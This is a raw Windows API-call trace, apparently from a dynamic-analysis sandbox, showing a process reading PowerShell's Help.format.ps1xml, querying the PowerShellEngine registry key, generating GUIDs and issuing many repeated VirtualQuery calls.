	[0298.613] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0298.613] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0xf37, lpOverlapped=0x0) returned 1
	[0298.613] ReadFile (in: hFile=0x300, lpBuffer=0x2eed107, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eed107*, lpNumberOfBytesRead=0x1cd398*=0x0, lpOverlapped=0x0) returned 1
	[0298.614] ReadFile (in: hFile=0x300, lpBuffer=0x2eeda68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x2eeda68*, lpNumberOfBytesRead=0x1cd398*=0x0, lpOverlapped=0x0) returned 1
	[0298.614] SetErrorMode (uMode=0x1) returned 0x1
	[0298.614] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd340 | out: lpFileInformation=0x1cd340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0298.614] SetErrorMode (uMode=0x1) returned 0x1
	[0298.614] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0298.614] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd428 | out: phkResult=0x1cd428*=0x300) returned 0x0
	[0298.614] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd3ac, lpData=0x0, lpcbData=0x1cd3a8*=0x0 | out: lpType=0x1cd3ac*=0x1, lpData=0x0, lpcbData=0x1cd3a8*=0x56) returned 0x0
	[0298.614] CoTaskMemAlloc (cb=0x5a) returned 0x1b830740
	[0298.614] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd37c, lpData=0x1b830740, lpcbData=0x1cd378*=0x56 | out: lpType=0x1cd37c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd378*=0x56) returned 0x0
	[0298.614] CoTaskMemFree (pv=0x1b830740) 
	[0298.615] RegCloseKey (hKey=0x300) returned 0x0
	[0298.615] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0298.615] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0299.450] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x624b5c37, Data2=0x2070, Data3=0x40da, Data4=([0]=0x8b, [1]=0x9, [2]=0x2, [3]=0x6e, [4]=0x12, [5]=0x4b, [6]=0x80, [7]=0x34))) returned 0x0
	[0299.450] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0xa9f8ac88, Data2=0xaef8, Data3=0x48b0, Data4=([0]=0x84, [1]=0x2, [2]=0x9e, [3]=0x8d, [4]=0xdd, [5]=0x7a, [6]=0xe2, [7]=0x64))) returned 0x0
	[0299.457] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x838e44a2, Data2=0xe137, Data3=0x47a0, Data4=([0]=0xb0, [1]=0x84, [2]=0x13, [3]=0x39, [4]=0x80, [5]=0xd3, [6]=0xfb, [7]=0x3b))) returned 0x0
	[0299.458] VirtualQuery (in: lpAddress=0x1cb660, lpBuffer=0x1cc520, dwLength=0x30 | out: lpBuffer=0x1cc520*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.458] VirtualQuery (in: lpAddress=0x1cb6f0, lpBuffer=0x1cc5b0, dwLength=0x30 | out: lpBuffer=0x1cc5b0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.458] VirtualQuery (in: lpAddress=0x1cbe70, lpBuffer=0x1ccd30, dwLength=0x30 | out: lpBuffer=0x1ccd30*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.458] VirtualQuery (in: lpAddress=0x1cbe70, lpBuffer=0x1ccd30, dwLength=0x30 | out: lpBuffer=0x1ccd30*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.458] VirtualQuery (in: lpAddress=0x1cbe70, lpBuffer=0x1ccd30, dwLength=0x30 | out: lpBuffer=0x1ccd30*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.458] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.458] VirtualQuery (in: lpAddress=0x1cbe60, lpBuffer=0x1ccd20, dwLength=0x30 | out: lpBuffer=0x1ccd20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.458] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.458] VirtualQuery (in: lpAddress=0x1cbe60, lpBuffer=0x1ccd20, dwLength=0x30 | out: lpBuffer=0x1ccd20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.459] VirtualQuery (in: lpAddress=0x1cbe60, lpBuffer=0x1ccd20, dwLength=0x30 | out: lpBuffer=0x1ccd20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.459] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.459] VirtualQuery (in: lpAddress=0x1cbe60, lpBuffer=0x1ccd20, dwLength=0x30 | out: lpBuffer=0x1ccd20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.459] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.459] VirtualQuery (in: lpAddress=0x1cbe60, lpBuffer=0x1ccd20, dwLength=0x30 | out: lpBuffer=0x1ccd20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.459] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.459] VirtualQuery (in: lpAddress=0x1cbe60, lpBuffer=0x1ccd20, dwLength=0x30 | out: lpBuffer=0x1ccd20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.459] VirtualQuery (in: lpAddress=0x1cbaa0, lpBuffer=0x1cc960, dwLength=0x30 | out: lpBuffer=0x1cc960*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.459] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.459] VirtualQuery (in: lpAddress=0x1cbe60, lpBuffer=0x1ccd20, dwLength=0x30 | out: lpBuffer=0x1ccd20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.459] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.460] VirtualQuery (in: lpAddress=0x1cbe60, lpBuffer=0x1ccd20, dwLength=0x30 | out: lpBuffer=0x1ccd20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.460] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0xfd62ab58, Data2=0x1958, Data3=0x42c9, Data4=([0]=0x9a, [1]=0xe1, [2]=0x3e, [3]=0xce, [4]=0x79, [5]=0xb, [6]=0xf0, [7]=0x55))) returned 0x0
	[0299.460] VirtualQuery (in: lpAddress=0x1cbe70, lpBuffer=0x1ccd30, dwLength=0x30 | out: lpBuffer=0x1ccd30*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.460] VirtualQuery (in: lpAddress=0x1cbe70, lpBuffer=0x1ccd30, dwLength=0x30 | out: lpBuffer=0x1ccd30*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.460] VirtualQuery (in: lpAddress=0x1cbe70, lpBuffer=0x1ccd30, dwLength=0x30 | out: lpBuffer=0x1ccd30*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.460] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.460] VirtualQuery (in: lpAddress=0x1cbe60, lpBuffer=0x1ccd20, dwLength=0x30 | out: lpBuffer=0x1ccd20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.461] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.461] VirtualQuery (in: lpAddress=0x1cbe60, lpBuffer=0x1ccd20, dwLength=0x30 | out: lpBuffer=0x1ccd20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.461] VirtualQuery (in: lpAddress=0x1cbe60, lpBuffer=0x1ccd20, dwLength=0x30 | out: lpBuffer=0x1ccd20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.461] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.461] VirtualQuery (in: lpAddress=0x1cbe60, lpBuffer=0x1ccd20, dwLength=0x30 | out: lpBuffer=0x1ccd20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.461] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.461] VirtualQuery (in: lpAddress=0x1cbe60, lpBuffer=0x1ccd20, dwLength=0x30 | out: lpBuffer=0x1ccd20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.461] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.461] VirtualQuery (in: lpAddress=0x1cbe60, lpBuffer=0x1ccd20, dwLength=0x30 | out: lpBuffer=0x1ccd20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.461] VirtualQuery (in: lpAddress=0x1cbaa0, lpBuffer=0x1cc960, dwLength=0x30 | out: lpBuffer=0x1cc960*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.461] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.462] VirtualQuery (in: lpAddress=0x1cbe60, lpBuffer=0x1ccd20, dwLength=0x30 | out: lpBuffer=0x1ccd20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.462] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.462] VirtualQuery (in: lpAddress=0x1cbe60, lpBuffer=0x1ccd20, dwLength=0x30 | out: lpBuffer=0x1ccd20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.462] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0xdc6771e0, Data2=0xd0a2, Data3=0x4de5, Data4=([0]=0xaa, [1]=0xba, [2]=0x51, [3]=0x79, [4]=0xde, [5]=0xa, [6]=0xde, [7]=0x2a))) returned 0x0
	[0299.462] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0xe8696b77, Data2=0x37ec, Data3=0x45a2, Data4=([0]=0x95, [1]=0xce, [2]=0xc7, [3]=0xdf, [4]=0x56, [5]=0x63, [6]=0xab, [7]=0xbe))) returned 0x0
	[0299.462] VirtualQuery (in: lpAddress=0x1cb4d0, lpBuffer=0x1cc390, dwLength=0x30 | out: lpBuffer=0x1cc390*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.462] VirtualQuery (in: lpAddress=0x1cb4d0, lpBuffer=0x1cc390, dwLength=0x30 | out: lpBuffer=0x1cc390*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.462] VirtualQuery (in: lpAddress=0x1cb560, lpBuffer=0x1cc420, dwLength=0x30 | out: lpBuffer=0x1cc420*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.463] VirtualQuery (in: lpAddress=0x1cb4d0, lpBuffer=0x1cc390, dwLength=0x30 | out: lpBuffer=0x1cc390*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.463] VirtualQuery (in: lpAddress=0x1cb560, lpBuffer=0x1cc420, dwLength=0x30 | out: lpBuffer=0x1cc420*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.463] VirtualQuery (in: lpAddress=0x1cb4d0, lpBuffer=0x1cc390, dwLength=0x30 | out: lpBuffer=0x1cc390*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.463] VirtualQuery (in: lpAddress=0x1cb560, lpBuffer=0x1cc420, dwLength=0x30 | out: lpBuffer=0x1cc420*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.463] VirtualQuery (in: lpAddress=0x1cb4d0, lpBuffer=0x1cc390, dwLength=0x30 | out: lpBuffer=0x1cc390*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.463] VirtualQuery (in: lpAddress=0x1cb560, lpBuffer=0x1cc420, dwLength=0x30 | out: lpBuffer=0x1cc420*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.463] VirtualQuery (in: lpAddress=0x1cb4d0, lpBuffer=0x1cc390, dwLength=0x30 | out: lpBuffer=0x1cc390*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.463] VirtualQuery (in: lpAddress=0x1cb560, lpBuffer=0x1cc420, dwLength=0x30 | out: lpBuffer=0x1cc420*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.463] VirtualQuery (in: lpAddress=0x1cb4d0, lpBuffer=0x1cc390, dwLength=0x30 | out: lpBuffer=0x1cc390*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.463] VirtualQuery (in: lpAddress=0x1cb560, lpBuffer=0x1cc420, dwLength=0x30 | out: lpBuffer=0x1cc420*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.464] VirtualQuery (in: lpAddress=0x1cbf70, lpBuffer=0x1cce30, dwLength=0x30 | out: lpBuffer=0x1cce30*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.464] VirtualQuery (in: lpAddress=0x1cbf70, lpBuffer=0x1cce30, dwLength=0x30 | out: lpBuffer=0x1cce30*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.464] VirtualQuery (in: lpAddress=0x1cbf70, lpBuffer=0x1cce30, dwLength=0x30 | out: lpBuffer=0x1cce30*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.464] VirtualQuery (in: lpAddress=0x1cbf70, lpBuffer=0x1cce30, dwLength=0x30 | out: lpBuffer=0x1cce30*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.464] VirtualQuery (in: lpAddress=0x1cb660, lpBuffer=0x1cc520, dwLength=0x30 | out: lpBuffer=0x1cc520*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.464] VirtualQuery (in: lpAddress=0x1cb6f0, lpBuffer=0x1cc5b0, dwLength=0x30 | out: lpBuffer=0x1cc5b0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.465] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.465] VirtualQuery (in: lpAddress=0x1cbe60, lpBuffer=0x1ccd20, dwLength=0x30 | out: lpBuffer=0x1ccd20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.465] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.465] VirtualQuery (in: lpAddress=0x1cbe60, lpBuffer=0x1ccd20, dwLength=0x30 | out: lpBuffer=0x1ccd20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.465] VirtualQuery (in: lpAddress=0x1cbe60, lpBuffer=0x1ccd20, dwLength=0x30 | out: lpBuffer=0x1ccd20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.465] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.465] VirtualQuery (in: lpAddress=0x1cbe60, lpBuffer=0x1ccd20, dwLength=0x30 | out: lpBuffer=0x1ccd20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.465] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.465] VirtualQuery (in: lpAddress=0x1cbe60, lpBuffer=0x1ccd20, dwLength=0x30 | out: lpBuffer=0x1ccd20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
